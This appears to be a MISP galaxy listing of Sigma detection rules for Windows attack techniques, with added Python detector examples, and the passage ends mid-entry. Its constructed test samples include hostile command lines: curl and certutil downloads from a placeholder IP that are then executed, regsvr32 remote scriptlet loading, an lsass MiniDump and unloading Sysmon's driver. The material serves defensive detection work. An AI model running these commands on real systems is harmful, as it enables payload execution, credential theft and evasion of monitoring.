tags ['attack.discovery']

Suspicious Group And Account Reconnaissance Activity Using Net.EXE

Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE. Check whether the user that executed the commands is itself suspicious (e.g. service accounts, LOCAL_SYSTEM).

Internal MISP references

UUID d95de845-b83c-4a9a-8a6a-4fc802ebf6c0 which can be used as unique global reference for Suspicious Group And Account Reconnaissance Activity Using Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019/01/16
falsepositive ['Inventory tool runs', 'Administrative activity']
filename proc_creation_win_net_groups_and_accounts_recon.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1087.001', 'attack.t1087.002']
Related clusters

To see the related clusters, click here.

UAC Bypass Using IEInstal - Process

Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)

Internal MISP references

UUID 80fc36aa-945e-4181-89f2-2f907ab6775d which can be used as unique global reference for UAC Bypass Using IEInstal - Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/30
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_ieinstal.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

HackTool - Stracciatella Execution

Detects Stracciatella, a tool that executes a PowerShell runspace from within C# (the SharpPick technique) with AMSI, ETW and Script Block Logging disabled, based on PE metadata characteristics.

Internal MISP references

UUID 7a4d9232-92fc-404d-8ce1-4c92e7caf539 which can be used as unique global reference for HackTool - Stracciatella Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2023/04/17
falsepositive ['Unlikely']
filename proc_creation_win_hktl_stracciatella_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1059', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Potential Network Sniffing Activity Using Network Tools

Detects potential network sniffing via use of network tools such as "tshark", "windump". Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.

Internal MISP references

UUID ba1f7802-adc7-48b4-9ecb-81e227fddfd5 which can be used as unique global reference for Potential Network Sniffing Activity Using Network Tools in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019/10/21
falsepositive ['Legitimate administration activity to troubleshoot network issues']
filename proc_creation_win_susp_network_sniffing.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.discovery', 'attack.t1040']
Related clusters

To see the related clusters, click here.

DNS Exfiltration and Tunneling Tools Execution

Detects the execution of well-known DNS exfiltration and tunneling tools.

Internal MISP references

UUID 98a96a5a-64a0-4c42-92c5-489da3866cb0 which can be used as unique global reference for DNS Exfiltration and Tunneling Tools Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, oscd.community
creation_date 2019/10/24
falsepositive ['Unlikely']
filename proc_creation_win_dns_exfiltration_tools_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration', 'attack.t1048.001', 'attack.command_and_control', 'attack.t1071.004', 'attack.t1132.001']
Related clusters

To see the related clusters, click here.

Share And Session Enumeration Using Net.EXE

Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag.
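
As an added illustration (not code from this page or from the Sigma project) of how the share/session enumeration rule above and the "Suspicious Group And Account Reconnaissance Activity Using Net.EXE" rule earlier on this page can be applied to process creation events, the following Python classifies net.exe/net1.exe sub-commands over constructed events, flags machine accounts and LOCAL_SYSTEM as the rule description suggests, and collapses the duplicate event that net.exe produces when it hands the command to net1.exe. The sub-command lists, the CommandLine/User field names and the sample events are my assumptions.

```python
from collections import namedtuple

Finding = namedtuple("Finding", "category command_line user suspicious_user")

ACCOUNT_SUBCMDS = {"user", "group", "localgroup", "accounts"}   # account and group recon
SHARE_SUBCMDS = {"view", "share", "session", "sessions"}        # share and session enumeration
# Arguments that turn "net user"/"net group" into account management rather than enumeration.
MODIFYING = {"/add", "/delete", "/del", "/active:yes", "/active:no"}

# Constructed events (Sysmon-style CommandLine/User fields). net.exe forwards to net1.exe,
# so the second event is the child of the first and carries the same arguments.
SAMPLE_EVENTS = [
    {"CommandLine": "net user /domain", "User": r"CORP\jdoe"},
    {"CommandLine": r"C:\Windows\system32\net1 user /domain", "User": r"CORP\jdoe"},
    {"CommandLine": 'net group "Domain Admins" /domain', "User": r"NT AUTHORITY\SYSTEM"},
    {"CommandLine": r"net view \\FILESRV01", "User": r"CORP\WS01$"},
    {"CommandLine": "net user backup_svc P@ssw0rd! /add", "User": r"CORP\jdoe"},
    {"CommandLine": r"net use Z: \\FILESRV01\share", "User": r"CORP\jdoe"},
]

def parse_net(command_line):
    """Return (subcommand, args) for a net.exe/net1.exe command line, else None."""
    parts = command_line.strip().split()
    if len(parts) < 2:
        return None
    exe = parts[0].strip('"').lower().rsplit("\\", 1)[-1]
    if exe not in ("net", "net.exe", "net1", "net1.exe"):
        return None
    return parts[1].lower(), [p.lower() for p in parts[2:]]

def is_suspicious_user(user):
    """Machine accounts (trailing $) and LOCAL_SYSTEM rarely run interactive reconnaissance."""
    u = user.lower()
    return u.endswith("$") or u in ("nt authority\\system", "system")

def classify(event):
    parsed = parse_net(event.get("CommandLine", ""))
    if parsed is None:
        return None
    sub, args = parsed
    if any(a in MODIFYING for a in args):
        return None                      # account creation/deletion is another rule's job
    if sub in ACCOUNT_SUBCMDS:
        category = "account_recon"
    elif sub in SHARE_SUBCMDS:
        category = "share_session_enum"
    else:
        return None
    user = event.get("User", "")
    return Finding(category, event["CommandLine"], user, is_suspicious_user(user))

def scan(events):
    """Classify every event, collapsing the net.exe/net1.exe duplicate pair into one finding."""
    seen, findings = set(), []
    for event in events:
        finding = classify(event)
        if finding is None:
            continue
        sub, args = parse_net(event["CommandLine"])
        key = (finding.user.lower(), sub, tuple(args))
        if key in seen:
            continue
        seen.add(key)
        findings.append(finding)
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f.category, "| user:", f.user, "| suspicious user:", f.suspicious_user, "|", f.command_line)
```

Because the image is checked on the first token, a `cmd /c net view` line is not matched on the cmd.exe event itself; it is caught on the child net.exe event, which is what a process creation source delivers anyway. The deduplication key is deliberately user plus arguments, since the two events differ only in the binary path.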

Internal MISP references

UUID 62510e69-616b-4078-b371-847da438cc03 which can be used as unique global reference for Share And Session Enumeration Using Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Endgame, JHasenbusch (ported for oscd.community)
creation_date 2018/10/30
falsepositive ['Legitimate use of net.exe utility by legitimate user']
filename proc_creation_win_net_view_share_and_sessions_enum.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1018']
Related clusters

To see the related clusters, click here.

Suspicious Child Process Of BgInfo.EXE

Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript

Internal MISP references

UUID 811f459f-9231-45d4-959a-0266c6311987 which can be used as unique global reference for Suspicious Child Process Of BgInfo.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/16
falsepositive ['Unknown']
filename proc_creation_win_bginfo_suspicious_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.005', 'attack.defense_evasion', 'attack.t1218', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Potential Regsvr32 Commandline Flag Anomaly

Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag (call DllInstall) is used without the "/n" flag (do not call DllRegisterServer), a combination that should be uncommon.
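
The following Python is an added example (not code from this page or from the Sigma project) of the switch check the rule describes, run over constructed process creation events. It tokenizes single-letter regsvr32 switches, tolerating both "/" and "-" prefixes and the "/i:argument" form, and flags "/i" without "/n" only when the image really is regsvr32.exe. The event field names and samples are my assumptions.

```python
import re

# Constructed process_creation events (not taken from the page or from the Sigma rule).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s /n /u /i:http://203.0.113.5/a.sct scrobj.dll"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s /i:http://203.0.113.5/a.sct scrobj.dll"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
    {"Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "CommandLine": r"regsvr32 -i -s C:\Users\Public\payload.dll"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c echo /i"},
]

# A switch is "/" or "-" followed by one letter at the start of a whitespace-delimited token;
# /i may carry an argument after a colon (/i:cmdline). The lookbehind keeps the slashes inside
# URLs (http://host/a) and the backslashes inside paths from being read as switches.
SWITCH_RE = re.compile(r"(?<!\S)[/-]([A-Za-z])(?::\S*)?(?=\s|$)")

def regsvr32_switches(command_line):
    """Lower-cased single-letter switches present on a regsvr32 command line."""
    return {m.group(1).lower() for m in SWITCH_RE.finditer(command_line)}

def is_flag_anomaly(event):
    """/i (call DllInstall) without /n (skip DllRegisterServer) on a regsvr32 process."""
    image = event.get("Image", "").lower()
    if not image.endswith("\\regsvr32.exe"):
        return False
    switches = regsvr32_switches(event.get("CommandLine", ""))
    return "i" in switches and "n" not in switches

def find_anomalies(events):
    return [e["CommandLine"] for e in events if is_flag_anomaly(e)]

if __name__ == "__main__":
    for line in find_anomalies(SAMPLE_EVENTS):
        print("regsvr32 flag anomaly:", line)
```

Note what the first sample shows: the classic "/s /n /u /i:url scrobj.dll" scriptlet invocation does use "/n" and is therefore not what this rule is for; it is covered by other regsvr32 rules. The rule is intentionally narrow, which is also why an administrator typo ("/i" meant as "/n /i") is the stated false positive.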

Internal MISP references

UUID b236190c-1c61-41e9-84b3-3fe03f6d76b0 which can be used as unique global reference for Potential Regsvr32 Commandline Flag Anomaly in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/07/13
falsepositive ['Administrator typo might cause some false positives']
filename proc_creation_win_regsvr32_flags_anomaly.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.010']
Related clusters

To see the related clusters, click here.

Findstr GPP Passwords

Detects findstr being used to look for the encrypted "cpassword" value within Group Policy Preference XML files on the Domain Controller's SYSVOL share. The value can be decrypted with gpp-decrypt because the AES key used by Group Policy Preferences is publicly documented.

Internal MISP references

UUID 91a2c315-9ee6-4052-a853-6f6a8238f90d which can be used as unique global reference for Findstr GPP Passwords in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/27
falsepositive ['Unknown']
filename proc_creation_win_findstr_gpp_passwords.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.006']
Related clusters

To see the related clusters, click here.

Finger.exe Suspicious Invocation

Detects execution of the aged finger.exe utility, which has little legitimate use today but has been observed in malware attacks as a download mechanism.

Internal MISP references

UUID af491bca-e752-4b44-9c86-df5680533dbc which can be used as unique global reference for Finger.exe Suspicious Invocation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), omkar72, oscd.community
creation_date 2021/02/24
falsepositive ['Admin activity (unclear what they do nowadays with finger.exe)']
filename proc_creation_win_finger_usage.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Suspicious Rundll32 Activity Invoking Sys File

Detects a suspicious rundll32 invocation whose command line references a *.sys file, as observed in UNC2452 activity.

Internal MISP references

UUID 731231b9-0b5d-4219-94dd-abb6959aa7ea which can be used as unique global reference for Suspicious Rundll32 Activity Invoking Sys File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/03/05
falsepositive ['Unknown']
filename proc_creation_win_rundll32_sys.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

HackTool - UACMe Akagi Execution

Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata

Internal MISP references

UUID d38d2fa4-98e6-4a24-aff1-410b0c9ad177 which can be used as unique global reference for HackTool - UACMe Akagi Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)
creation_date 2021/08/30
falsepositive ['Unknown']
filename proc_creation_win_hktl_uacme.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Potential Arbitrary Command Execution Using Msdt.EXE

Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability

Internal MISP references

UUID 258fc8ce-8352-443a-9120-8a11e4857fa5 which can be used as unique global reference for Potential Arbitrary Command Execution Using Msdt.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/05/29
falsepositive ['Unknown']
filename proc_creation_win_msdt_arbitrary_command_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Cloudflared Quick Tunnel Execution

Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB. The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com. The tool has been observed in use by threat groups including Akira ransomware.

Internal MISP references

UUID 222129f7-f4dc-4568-b0d2-22440a9639ba which can be used as unique global reference for Cloudflared Quick Tunnel Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sajid Nawaz Khan
creation_date 2023/12/20
falsepositive ['Legitimate usage of Cloudflare Quick Tunnel']
filename proc_creation_win_cloudflared_quicktunnel_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1090.001']
Related clusters

To see the related clusters, click here.

Compressed File Extraction Via Tar.EXE

Detects execution of "tar.exe" in order to extract compressed files. Adversaries may abuse various utilities to decompress data in order to avoid detection.

Internal MISP references

UUID bf361876-6620-407a-812f-bfe11e51e924 which can be used as unique global reference for Compressed File Extraction Via Tar.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author AdmU3
creation_date 2023/12/19
falsepositive ['Likely']
filename proc_creation_win_tar_extraction.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.exfiltration', 'attack.t1560', 'attack.t1560.001']
Related clusters

To see the related clusters, click here.

Sysmon Driver Unloaded Via Fltmc.EXE

Detects the Sysmon filter driver possibly being unloaded via fltmc.exe.
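
The Python below is an added example (not code from this page or from the Sigma project) of the check this rule describes, with the one caveat a practitioner needs: Sysmon's minifilter is called SysmonDrv by default, but the name can be changed at install time with Sysmon's -d switch, and a detector keyed on the default name then misses the unload. The example therefore takes the deployed driver name as a parameter and still reports any other unload at a lower level. The sample command lines are constructed.

```python
import re

DEFAULT_SYSMON_DRIVER = "SysmonDrv"   # Sysmon's default filter name; changed with the -d install switch

# "fltmc unload <filter>", with or without .exe, path or quotes around the binary or filter name.
UNLOAD_RE = re.compile(
    r'^\s*"?(?:[^"\s]*\\)?fltmc(?:\.exe)?"?\s+unload\s+"?([^"\s]+)"?', re.IGNORECASE)

# Constructed command lines; the third assumes Sysmon was installed with a renamed driver.
SAMPLE_COMMAND_LINES = [
    "fltmc.exe unload SysmonDrv",
    r"C:\Windows\System32\fltmc.exe unload sysmondrv",
    "fltmc unload MyCustomDrv",
    "fltmc.exe filters",
    "fltmc unload bindflt",
]

def fltmc_unload_target(command_line):
    """Return the minifilter name passed to 'fltmc unload', or None for any other command."""
    m = UNLOAD_RE.match(command_line)
    return m.group(1) if m else None

def assess(command_line, sysmon_driver=DEFAULT_SYSMON_DRIVER):
    """'high' when the Sysmon minifilter is unloaded, 'low' for any other unload, None otherwise."""
    target = fltmc_unload_target(command_line)
    if target is None:
        return None
    return "high" if target.lower() == sysmon_driver.lower() else "low"

def scan(command_lines, sysmon_driver=DEFAULT_SYSMON_DRIVER):
    """(command line, level) for every unload seen, using the driver name you actually deployed."""
    return [(c, level) for c in command_lines if (level := assess(c, sysmon_driver))]

if __name__ == "__main__":
    for line, level in scan(SAMPLE_COMMAND_LINES, sysmon_driver="MyCustomDrv"):
        print(level.upper(), line)
```

Unloading a minifilter needs administrative rights, so the rule is only meaningful after a privilege boundary has already been crossed; the "low" findings are still worth keeping, because an attacker who guesses wrong about the driver name produces exactly that pattern before the correct one.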

Internal MISP references

UUID 4d7cda18-1b12-4e52-b45c-d28653210df8 which can be used as unique global reference for Sysmon Driver Unloaded Via Fltmc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Kirill Kiryanov, oscd.community
creation_date 2019/10/23
falsepositive ['Unlikely']
filename proc_creation_win_fltmc_unload_driver_sysmon.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070', 'attack.t1562', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

Potential CommandLine Path Traversal Via Cmd.EXE

Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking

Internal MISP references

UUID 087790e3-3287-436c-bccf-cbd0184a7db1 which can be used as unique global reference for Potential CommandLine Path Traversal Via Cmd.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author xknow @xknow_infosec, Tim Shelton
creation_date 2020/06/11
falsepositive ['Java tools are known to produce false-positive when loading libraries']
filename proc_creation_win_cmd_path_traversal.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.003']
Related clusters

To see the related clusters, click here.

Curl Download And Execute Combination

Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
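
As an added example (not code from this page or from the Sigma project) of the download-and-execute combination described above, the Python below splits a cmd.exe one-liner on its command separators, finds the file that curl writes with -o/--output or -O, and reports a hit only when a later segment executes that same file, either directly or through a launcher such as start or powershell. The separator handling, the launcher list and the sample command lines are my assumptions.

```python
import re

SEPARATOR_RE = re.compile(r"&&|\|\||&|\|")
LAUNCHERS = {"start", "cmd", "rundll32", "regsvr32", "powershell", "pwsh", "mshta", "wscript", "cscript"}

# Constructed command lines; the last two are deliberate non-matches.
SAMPLE_COMMAND_LINES = [
    r"cmd.exe /c curl http://203.0.113.5/s.exe -o C:\Users\Public\s.exe & C:\Users\Public\s.exe",
    r'curl.exe -s https://203.0.113.5/u.ps1 --output C:\Windows\Temp\u.ps1 && powershell -ep bypass -f "C:\Windows\Temp\u.ps1"',
    "curl -O http://203.0.113.5/tool.exe & start tool.exe",
    r"curl -o C:\Temp\report.pdf https://intranet.example/report.pdf",
    "curl https://api.example/health | findstr ok",
    "curl -o out.json https://api.example/x & type out.json",
    r"certutil -urlcache -f http://203.0.113.5/a.exe a.exe & a.exe",
]

def basename(token):
    """Last path component, lower-cased, without quotes or a rundll32-style ',Export' suffix."""
    return token.strip('"').split(",")[0].rsplit("\\", 1)[-1].lower()

def split_chain(command_line):
    """Split a cmd.exe one-liner on &, &&, |, || (quotes and ^ escapes are ignored; enough for detection)."""
    return [p.strip() for p in SEPARATOR_RE.split(command_line) if p.strip()]

def curl_output_file(segment):
    """File that curl writes with -o/--output (or -O/--remote-name), else None."""
    toks = segment.replace('"', "").split()
    curl_at = next((i for i, t in enumerate(toks) if basename(t) in ("curl", "curl.exe")), None)
    if curl_at is None:
        return None
    for i in range(curl_at + 1, len(toks)):
        t = toks[i]
        if t in ("-o", "--output") and i + 1 < len(toks):
            return toks[i + 1]
        if t.startswith("--output="):
            return t.split("=", 1)[1]
        if t in ("-O", "--remote-name"):            # file name comes from the URL's last component
            urls = [u for u in toks if re.match(r"https?://", u, re.IGNORECASE)]
            return urls[0].rsplit("/", 1)[-1] if urls else None
    return None

def is_download_exec_combo(command_line):
    """True when a later segment of the same command line runs the file curl just wrote."""
    segments = split_chain(command_line)
    for i, segment in enumerate(segments):
        written = curl_output_file(segment)
        if written is None:
            continue
        target = basename(written)
        for later in segments[i + 1:]:
            toks = later.split()
            if not toks:
                continue
            first = basename(toks[0])
            if first == target:                                   # "... & payload.exe"
                return True
            if first.removesuffix(".exe") in LAUNCHERS and any(basename(t) == target for t in toks[1:]):
                return True                                       # "... & start payload.exe"
    return False

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print("HIT " if is_download_exec_combo(line) else "    ", line)
```

Two limits are worth knowing before tuning on real data: bundled short options such as "-sLo file" are not parsed here, and a "^&" escape or a quoted ampersand would be split like a real separator. The certutil sample is a non-match on purpose; that downloader has rules of its own.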

Internal MISP references

UUID 21dd6d38-2b18-4453-9404-a0fe4a0cc288 which can be used as unique global reference for Curl Download And Execute Combination in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman, Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/01/13
falsepositive ['Unknown']
filename proc_creation_win_cmd_curl_download_exec_combo.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Copy From Or To Admin Share Or Sysvol Folder

Detects a copy command or a copy utility execution to or from an administrative share (such as C$ or ADMIN$) or the SYSVOL folder on a remote host.

Internal MISP references

UUID 855bc8b5-2ae8-402e-a9ed-b889e6df1900 which can be used as unique global reference for Copy From Or To Admin Share Or Sysvol Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali
creation_date 2019/12/30
falsepositive ['Administrative scripts']
filename proc_creation_win_susp_copy_lateral_movement.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.collection', 'attack.exfiltration', 'attack.t1039', 'attack.t1048', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

UAC Bypass via ICMLuaUtil

Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface

Internal MISP references

UUID 49f2f17b-b4c8-4172-a68b-d5bf95d05130 which can be used as unique global reference for UAC Bypass via ICMLuaUtil in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Elastic (idea)
creation_date 2022/09/13
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_icmluautil.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

HackTool - ADCSPwn Execution

Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an Active Directory network by coercing authentication from machine accounts and relaying it to the certificate service.

Internal MISP references

UUID cd8c163e-a19b-402e-bdd5-419ff5859f12 which can be used as unique global reference for HackTool - ADCSPwn Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/07/31
falsepositive ['Unlikely']
filename proc_creation_win_hktl_adcspwn.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1557.001']
Related clusters

To see the related clusters, click here.

Sysprep on AppData Folder

Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)

Internal MISP references

UUID d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e which can be used as unique global reference for Sysprep on AppData Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/06/22
falsepositive ['False positives depend on scripts and administrative tools used in the monitored environment']
filename proc_creation_win_sysprep_appdata.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

HackTool - SharpEvtMute Execution

Detects the use of SharpEvtMute, a tool that tampers with the Windows event logs.

Internal MISP references

UUID bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c which can be used as unique global reference for HackTool - SharpEvtMute Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/09/07
falsepositive ['Unknown']
filename proc_creation_win_hktl_sharpevtmute.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

PowerShell Get-Process LSASS

Detects the "Get-Process" cmdlet, or one of its aliases, being run against the lsass process, which is in almost all cases a sign of malicious activity.
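
The Python below is an added example (not code from this page or from the Sigma project) of the cmdlet-and-alias matching the rule describes, run over constructed command lines. It covers Get-Process and the gps and ps aliases, with or without -Name/-ProcessName, and includes the typical comsvcs.dll MiniDump one-liner in which the cmdlet only appears inside a parenthesised expression. The regex and samples are my assumptions.

```python
import re

# Get-Process or its aliases gps/ps, optionally with -Name/-ProcessName, naming lsass.
# The lookbehind stops "ps" from matching inside words such as "https".
LSASS_RE = re.compile(
    r"(?<![\w-])(get-process|gps|ps)\s+(?:-(?:name|processname)\s+)?[\"']?lsass(?:\.exe)?\b",
    re.IGNORECASE)

# Constructed command lines; the last three are deliberate non-matches.
SAMPLE_COMMAND_LINES = [
    'powershell.exe -nop -c "Get-Process lsass"',
    r'powershell -c "rundll32 C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Users\Public\l.dmp full"',
    "powershell gps lsass | select Id",
    "powershell ps -Name lsass",
    "powershell Get-Process -Name svchost",
    "powershell Get-Process | Where-Object Name -eq lsass",
    'tasklist /fi "imagename eq lsass.exe"',
]

def references_lsass(command_line):
    """True when Get-Process (or gps/ps) is aimed at lsass on this command line."""
    return LSASS_RE.search(command_line) is not None

def matched_cmdlet(command_line):
    """Which spelling triggered the match, lower-cased, or None."""
    m = LSASS_RE.search(command_line)
    return m.group(1).lower() if m else None

def scan(command_lines):
    return [c for c in command_lines if references_lsass(c)]

if __name__ == "__main__":
    for line in scan(SAMPLE_COMMAND_LINES):
        print(matched_cmdlet(line), "->", line)
```

The sixth sample is the blind spot to remember: "Get-Process | Where-Object Name -eq lsass" never puts the cmdlet next to the process name, so a command-line match cannot see it. PowerShell Script Block Logging (event ID 4104) records the executed script text and is the better source for that variant.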

Internal MISP references

UUID b2815d0d-7481-4bf0-9b6c-a4c48a94b349 which can be used as unique global reference for PowerShell Get-Process LSASS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/04/23
falsepositive ['Unknown']
filename proc_creation_win_powershell_getprocess_lsass.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.004']
Related clusters

To see the related clusters, click here.

PUA - AdFind Suspicious Execution

Detects AdFind execution with common flags seen used during attacks

Internal MISP references

UUID 9a132afa-654e-11eb-ae93-0242ac130002 which can be used as unique global reference for PUA - AdFind Suspicious Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community
creation_date 2021/02/02
falsepositive ['Legitimate admin activity']
filename proc_creation_win_pua_adfind_susp_usage.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1018', 'attack.t1087.002', 'attack.t1482', 'attack.t1069.002', 'stp.1u']
Related clusters

To see the related clusters, click here.

HackTool - winPEAS Execution

WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz.

Internal MISP references

UUID 98b53e78-ebaf-46f8-be06-421aafd176d9 which can be used as unique global reference for HackTool - winPEAS Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Georg Lauenstein (sure[secure])
creation_date 2022/09/19
falsepositive ['Unlikely']
filename proc_creation_win_hktl_winpeas.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1082', 'attack.t1087', 'attack.t1046']
Related clusters

To see the related clusters, click here.

Root Certificate Installed From Susp Locations

Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.

Internal MISP references

UUID 5f6a601c-2ecb-498b-9c33-660362323afa which can be used as unique global reference for Root Certificate Installed From Susp Locations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/09
falsepositive ['Unlikely']
filename proc_creation_win_powershell_import_cert_susp_locations.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1553.004']
Related clusters

To see the related clusters, click here.

Tasks Folder Evasion

The Tasks folders under System32 and SysWOW64 are globally writable paths. Adversaries can take advantage of this to load or influence any script host or any .NET application in Tasks, and thereby load and execute a custom assembly into cscript, wscript, regsvr32, mshta or eventvwr.

Internal MISP references

